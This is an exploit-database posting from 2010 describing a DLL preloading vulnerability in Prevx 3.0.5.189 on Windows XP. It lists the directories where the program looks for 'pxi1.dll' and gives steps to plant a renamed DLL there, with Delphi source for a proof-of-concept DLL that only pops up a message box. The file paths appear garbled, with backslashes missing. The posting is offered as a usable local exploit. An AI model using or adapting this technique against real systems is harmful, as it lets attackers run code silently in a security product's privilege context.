[local exploits] - Prevx DLL preloading exploit
Posted on 11 September 2010
<!DOCTYPE html PUBLIC '-//W3C//DTD XHTML 1.0 Strict//EN' 'http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd'><html xmlns='http://www.w3.org/1999/xhtml'><head><meta http-equiv='Content-Type' content='text/html; charset=utf-8' /><meta http-equiv='Content-Language' content='en' /><title>Prevx DLL preloading exploit | Inj3ct0r - exploit database : vulnerability : 0day : shellcode</title><meta name='description' content='Exploit category: local exploits | Exploit author: STRELiTZIA' /><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon' /><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss' /><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></head><body><pre>============================ Prevx DLL preloading exploit ============================ ============================ Prevx DLL preloading exploit ============================ ==================================================== = PREVX DLL PRELOADING EXPLOIT = ==================================================== Exploit Title : [Prevx DLL preloading exploit] Date : [11 Sept 2010] Author : [STRELiTZIA] Software : [Prevx 3.0.5.189] Tested on : [Windows Xp SP3] ============================ = Description = ============================ Prevx search and laod "pxi1.dll" library without checks, or any visual warning messages related to library modifications. Vulnerability that can allow attackers to execute malicious code locally, without user consent, in the privilege context of the targeted application. ============================ = Instructions = ============================ Default searching folders: C:WINDOWSpxi1.dll C:WINDOWSsystempxi1.dll C:WINDOWSsystem32pxi1.dll C:WINDOWSsystem32wbempxi1.dll Additional folders if exists: C:Program FilesBorlandDelphi7Binpxi1.dll C:Program FilesBorlandDelphi7ProjectsBplpxi1.dll C:Documents and SettingsAll UsersDocumentsRAD Studio7.0Bplpxi1.dll 1- Copy "Test.dll" into "%One of listed folders% folder" 2- Rename "Test.dll" to "pxi1.dll" ============================ = Tests = ============================ - Launch Prevx. - Restart your PC. ============================ = Test Dll Source "Delphi" = ============================ Library Test; uses Windows; begin MessageBoxA ( 0, PChar('Yep, I''m running in your system without your permission.'), PChar('Sample'), MB_ICONSTOP ); end. # <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-09-11]</pre></body></html>
